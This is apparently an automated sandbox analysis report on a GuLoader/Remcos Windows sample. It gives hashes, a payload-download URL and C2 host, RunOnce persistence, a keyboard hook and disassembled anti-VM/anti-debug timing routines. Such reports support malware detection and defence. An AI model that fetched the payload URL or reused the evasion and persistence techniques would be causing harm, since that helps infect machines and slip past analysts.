Play interactive tour

Edit tour

Windows Analysis Report JXblq0dqPN.exe

Overview

General Information

Sample Name:	JXblq0dqPN.exe
Analysis ID:	458740
MD5:	8718d75b7cac53f13d01ddea9b52cee0
SHA1:	2a37a01df74c887bb52eb2762d7d6ae0bd5e6b0b
SHA256:	6f40242247db00eea1922d0c2a38337ddea49d9da02693679d2e4bfb19e6c088
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Creates autostart registry keys with suspicious values (likely registry only malware)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

JXblq0dqPN.exe (PID: 5988 cmdline: 'C:\Users\user\Desktop\JXblq0dqPN.exe' MD5: 8718D75B7CAC53F13D01DDEA9B52CEE0)

JXblq0dqPN.exe (PID: 4576 cmdline: 'C:\Users\user\Desktop\JXblq0dqPN.exe' MD5: 8718D75B7CAC53F13D01DDEA9B52CEE0)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe

ReversingLabs: Detection: 17%

Multi AV Scanner detection for submitted file

Show sources

Source: JXblq0dqPN.exe	Virustotal: Detection: 35%			Perma Link
Source: JXblq0dqPN.exe	ReversingLabs: Detection: 17%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: JXblq0dqPN.exe

Joe Sandbox ML: detected

Source: JXblq0dqPN.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: wealthyrem.ddns.net

Source: global traffic

TCP traffic: 192.168.2.7:49746 -> 194.5.97.128:39200

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: clientconfig.passport.net

Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\JXblq0dqPN.exe

Source: JXblq0dqPN.exe, 00000001.00000002.387805653.00000000007CA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02261C35 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226904A NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022658B5 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226483C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02264A0A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02264C62 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022646B5 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022642BF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226473E NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02265983 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02264BEB NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02268FFF NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02264BC5 NtWriteVirtualMemory,

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02261C35
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267012
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022658B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022624E2
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022620EC
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226950D
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02260557
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022685F4
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02260BF8
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02260223
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226483C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02264A0A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02264214
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02264C62
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02266475
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02260647
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02260641
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226885F
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022646B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022614B3
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022642BF
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022626BA
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02263896
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267E98
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022628E2
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022680FC
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02265CD0
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02262D2C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226473E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02260D0E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02260708
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226951E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226111B
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02268764
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02263D6D
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267776
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02260B71
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02262F7B
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02263147
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02262F54
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022615A5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02263FA3
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267FAE
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02265D82
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226218A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267BEC
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02264BEB
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02264BC5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022637C8

Source: JXblq0dqPN.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: JXblq0dqPN.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ANNONCEKAMPAGNE.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ANNONCEKAMPAGNE.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: JXblq0dqPN.exe, 00000001.00000000.229744008.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe, 00000001.00000002.387697389.0000000000770000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe, 00000011.00000002.1310162102.0000000002400000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe, 00000011.00000000.386257006.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe	Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe

Source: JXblq0dqPN.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@164/3

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

File created: C:\Users\user~1\AppData\Local\Temp\~DF27FD92C68F09D524.TMP

Jump to behavior

Source: JXblq0dqPN.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: JXblq0dqPN.exe	Virustotal: Detection: 35%
Source: JXblq0dqPN.exe	ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

File read: C:\Users\user\Desktop\JXblq0dqPN.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_00401367 pushfd ; iretd
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_00403268 pushfd ; iretd
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_0226A0E4 push FFFFFFD2h; iretd
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 17_2_0056A0E4 push FFFFFFD2h; iretd

Source: initial sample	Static PE information: section name: .text entropy: 7.08584386702
Source: initial sample	Static PE information: section name: .text entropy: 7.08584386702

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

File created: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs			Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs			Jump to behavior

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE	Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE	Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE	Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE	Jump to behavior

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02261C35 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022685F4 LoadLibraryA,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02260BF8 TerminateProcess,LoadLibraryA,
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022642BF NtWriteVirtualMemory,

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\ANNONCEKAMPAGNE.EXE\ROGUYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEOTATE
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\ANNONCEKAMPAGNE.EXE\ROGUYSET W = CREATEOBJECT("WSCRIPT.SHELL")

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 00000000022698AE second address: 0000000002269A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 0000000002267E2C second address: 0000000002267E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 0000000002264561 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov edx, dword ptr [ebp+0000027Ah] 0x00000009 push 64FFFEF9h 0x0000000e add dword ptr [esp], 9B136642h 0x00000015 xor dword ptr [esp], 8588ACC3h 0x0000001c xor dword ptr [esp], 859BC9F8h 0x00000023 cmp cx, cx 0x00000026 push dword ptr [ebp+50h] 0x00000029 call 00007F7648791C6Eh 0x0000002e call 00007F764878CCF5h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F764878CDD9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 0000000002264936 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000000d mov eax, ebp 0x0000000f add eax, 0000010Ch 0x00000014 mov dword ptr [ebp+0000021Ch], edi 0x0000001a mov edi, eax 0x0000001c push edi 0x0000001d mov edi, dword ptr [ebp+0000021Ch] 0x00000023 push dword ptr [ebp+000000FCh] 0x00000029 call 00007F7648A653A9h 0x0000002e call 00007F7648A60805h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F7648A608E9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 00000000005698AE second address: 0000000000569A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 0000000000567E2C second address: 0000000000567E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc
